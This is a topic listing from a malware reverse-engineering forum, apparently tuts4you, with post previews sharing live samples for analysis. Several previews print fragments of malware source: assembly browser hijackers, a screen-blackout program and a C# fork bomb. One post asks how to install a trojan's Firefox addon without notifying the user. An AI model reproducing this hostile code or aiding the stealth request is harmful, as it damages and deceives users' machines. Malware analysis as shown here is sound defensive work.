Malware Reverse Engineering
Debugging, disassembling and documenting interesting malware...
369 topics in this forum
-
Suspected Malware packed with AsPack
by NewEraCracker- 1 reply
- 7k views
Hello guys, Today I found this on a download. I think its a virus and I found that it is packed with Aspack. I've sent this to avira but if you can, please take a look (using an isolated virtual machine) Password: malware DO THIS ONLY IF YOU ARE EXPERIENCED. I DO NOT KNOW WHAT THIS FILE IS CAPABLE OF. malware.rar
-
take a look
by blackpirate- 5 replies
- 10k views
hey, i just found a link to an aapp, lets say very handy to have! i thought that its too nice to be real so i scanned the file first on virustotal , and without any positive result! then the bad things happened: after running it..the app created multile user accounts, loked mine (admin), deleted restore point... very nasty! can someone debugg it? to see whats its all about and if i tooked any risk? i had some important things on my pc! (passwords etc) PLEASE BE CAREFULL! RUN IT ON VIRTUAL MACHINE ONLY! FILE:http://www.sendspace.com/file/w04db8 thnx in advance! BP
-
General Considartions while Reversing Malicious Software
by mcanpuneet- 0 replies
- 3.6k views
I have little experience in reversing windows executable and DLLs using Ollydbg and some other debugger. I want to learn Malicious Software reversing. What general considration should be taken while reversing any malicious software. Any help will be appreciated. Thanks in advance
-
CSI Internet - Malware analysis series
by frank_boldewin- 0 replies
- 3.9k views
hi all, for anyone interested in malware analysis, here are the links to all 5 parts of our CSI Internet series. part1: malicious javascript />http://www.h-online.com/security/features/CSI-Internet-Alarm-at-the-pizza-service-1019940.html?view=print part2: malicious msoffice />http://www.h-online.com/security/features/CSI-Internet-The-image-of-death-1030311.html?view=print part3: malicious pdf />http://www.h-online.com/security/features/CSI-Internet-PDF-timebomb-1038864.html?view=print part4: malicious flash (integer overflow analysis) />http://www.h-online.com/security/features/CSI-Internet-Attack-of-the-killer-videos-1049197.html?view=print part5: malicious f…
-
Malware sample for practice
by GEEK- 13 replies
- 9k views
hey found this on my usb so i am guessing its not a very dangerous virus. i have sent it to any online AV checkers simply coz i am not bothered if anyone wants to practise i have zipped unedited binaries password: infected usb_malware_sample.rar
-
Mozilla Hijacker
by JMC31337- 0 replies
- 5.6k views
felt like p0wning mozilla with tasm32 ;tasm32 /ml foxjak ;tlink32 -x -c -aa foxjak,,,import32 .386P Locals jumps .Model Flat ,StdCallinclude windows.inc include vkkey.incextrn FindWindowExA:PROC extrn FindWindowA:PROC extrn SendMessageA:PROC extrn ExitProcess:PROC extrn MessageBoxA:PROC extrn SetForegroundWindow:PROC extrn keybd_event:PROC extrn Sleep:PROC extrn SetActiveWindow:PROC extern ShowWindow:PROC extrn SetWindowTextA:PROC extern CreateDirectoryA:PROC extrn CopyFileA:PROC extrn RegOpenKeyExA :PROC ;open a key (see chapter _4_), with a subkey extrn RegCloseKey :PROC ;close a key extrn RegCreateKeyA :PROC ;create's a new subkey extrn Re…
-
FAKE AV Virus
by JMC31337- 0 replies
- 4.7k views
FAKE AV VIRUS Fake_AV_Aug_2010.rar rar passwd: infected
-
IE8 Browser Hijack
by JMC31337- 0 replies
- 3.8k views
plenty of examples of an IE 8 hijacker on the net heres one in tasm32 ;tasm32 /ml hijak ;tlink32 -x -c -aa hijak,,,import32 .386P Locals jumps .Model Flat ,StdCallinclude windows.incextrn FindWindowExA:PROC extrn FindWindowA:PROC extrn SendMessageA:PROC extrn ExitProcess:PROC extrn MessageBoxA:PROC extrn SetForegroundWindow:PROC extrn keybd_event:PROC extrn Sleep:PROCVK_RETURN equ 0Dh SW_SHOWNORMAL equ 1.data? buff db ?.data hwnd dd 0 ieclass db "IEFrame",0 ieworker db"WorkerW",0 ieadd db "Address Combo Control",0 ienav db "Navigation Bar",0 ierebar db "ReBarWindow32",0 iebar db "ToolBarWindow32",0 ieedit db "Edit",0 ieroot db"Address Band Root",0 addrs db "http://www.goo…
-
Dr.mehdi.swensen PEiD v0.95
by Dr.mehdi.swensen.- 12 replies
- 9k views
I give this to all my friends in forum I hope to be accepted by all Crackers. tnx Mod edit; Removed attachment since it's both a rip and a virus. Explain or actions will be taken. Mod edit2; Uploaded attachment and moved topic to Malicious Software Research forum for discussion. User is banned from the board. Attachment password is: tuts4you Dr.mehdi.swensen PEiD v0.95.zip
-
Dual OS Virus
by cyb3rl0rd1867- 5 replies
- 7k views
I recently heard about w32/simile virus that was dangerous for both linux and windows. More info here. I was curious to know what the header of such a file would look like, since microsoft uses Pe headers and linux uses elf headers. How would it be possible to make it compatible with both?
-
Malware+Custom Obfusc+No detections
by chickenbutt- 4 replies
- 6.8k views
I didn't look to see what this does, beyong dropping binaries and making services. It has to be rebuilt to load in olly(the dropped binaries). KIS 2010,NIS 2010,Avira 2010 didn't detect with high heuristics. It's all ring 3 dfgdfgdgdgf.zip
-
W32.BlackOut
by JMC31337- 0 replies
- 6.6k views
black out the GUI .386 .model flat extrn MessageBoxA:proc extrn GetDC:proc extrn SetPixel:proc extrn GetSystemMetrics:proc extrn MessageBoxA:proc extrn GetPixel:PROC extrn BitBlt:PROC .data xc dd 0 ;width yc dd 0 ;height x dd 0 ;x-co y dd 0 ;y-co dc dd 0 .code start: xor eax,eax push eax call GetDC mov dword ptr dc,eax push 16 call GetSystemMetrics mov dword ptr xc,eax push 17 call GetSystemMetri…
-
Netsky B
by JMC31337- 3 replies
- 4.8k views
...
-
Flash / PDF 0day Analysis
by frank_boldewin- 5 replies
- 4.3k views
http://blog.zynamics.com/2010/06/09/analyzing-the-currently-exploited-0-day-for-adobe-reader-and-adobe-flash/ sebastian and me worked on that the last 2 days. maybe someone is interested. cheers, frank
-
C# Rabbit / Fork Bomb
by JMC31337- 0 replies
- 6.7k views
//JMC31337 //THE MAIN FORM CODE using System; using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Drawing; using System.Linq; using System.Text; using System.Windows.Forms; using System.Diagnostics;namespace WindowsFormsApplication1 { public partial class Form1 : Form { public Form1() { InitializeComponent(); } private void Form1_Load(object sender, EventArgs e) { string startpointPath = Application.ExecutablePath; for (int x = 0; x < 999999999; x++) { MessageBox.Show("RABBIT", "Attention"); Process.Sta…
-
Silent Firefox addon install
by Minister- 1 reply
- 3.9k views
Good day, I am creating a small trojan and encountered one problem. The trojan installs an addon for FF and the problem is - FF notifies user about it, spitting out window with "New addons installed". Any ideas how to bypass it, at least a hint, please? I've googled it and searched in Mozilla support forums, but for obvious reasons, nobody is keen on answering it
-
Explore the Vulnerability in the following snippets - Help Requried
by mystery_reverser- 5 replies
- 6.3k views
Hello Guys, I am a newbie to reverse engineering vulnerabilities. Following are some of the vulnerable codes, for which I want to know the answer for the following questions. It would be great if you guys explain elaborately so that I can kick start my vulnerability analysis with a bang. Please help me out guys. You can mail me the answers to mysteryreverse@gmail.com or post it here as doc file. Regards, Mystery Here is the doc file!! Vulnerablitity.zip Vulnerablitity.doc
-
WINDAZ, sLOTz, FALAFEL, KSCRACKiNG
by Aguila- 3 replies
- 6k views
Some guy is spreading his bot via scene releases. Mirc.v7.0.Incl.Keymaker-WiNDAZ Nero.v9.9.4.26.0b.Incl.Keymaker-WiNDAZ ESET.NOD32.Antivirus.v4.2.42.0.Incl.Keymaker-WiNDAZ JESET.NOD32.Antivirus.v4.2.42.0.Incl.Keymaker-WiNDAZ Avast.Internet.Security.v5.0.545.Incl.Keymaker-WiNDAZJules.v2.0.Cracked-sLOTz Eastern.Slots.v3.0.Cracked-sLOTz Cortez.Treasure.v1.0.Cracked-sLOTzKaspersky.Keygen.V1.WORKiNG.WiNALL-KSCRACKiNGWINX.HD.CAMCORDER.VIDEO.CONVERTER.V3.0-FALAFEL FRESH.VIEW.V7.94.READ.NFO-FALAFEL FRESH.DOWNLOAD.V8.48.READ.NFO-FALAFEL ........ Let's analyze his "work". idx.exe -> Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - Overlay : 2F7C5C... Nothing discov…
-
Spyware and or adware ?
by iamlegend- 2 replies
- 3.7k views
Hey guys i know this is maybe not software but in any chance, do u have an example of spyware or adware script ? or maybe a site or something out there have these threats ? i need one or two for my research.. like AdWare.Win32.Virtumonde or AdWare.Win32.Dm.vv thanks in advance
-
HTML CRYPTO TROJAN
by JMC31337- 0 replies
- 3.7k views
...
-
Interesting Stuff
by cyb3rl0rd1867- 5 replies
- 7.1k views
Here are some interesting samples I came across while disinfecting someone's machine. Let me know if you come across something interesting! Kaspersky Names: Trojan.win32.scar.bzuz Password:tuts4you syre32.rar
-
- 5 replies
- 4.8k views
An overview with some examples, written by ir3t from Black Storm Who said girls can't code !!? />http://portal.b-at-s.info/download.php?view.454
-
C# Replicator
by JMC31337- 0 replies
- 4.7k views
... moved to vxheavens
-
Mytob@MM
by JMC31337- 0 replies
- 3.4k views
...
-
W32 DLL Virii
by JMC31337- 0 replies
- 10.5k views
...
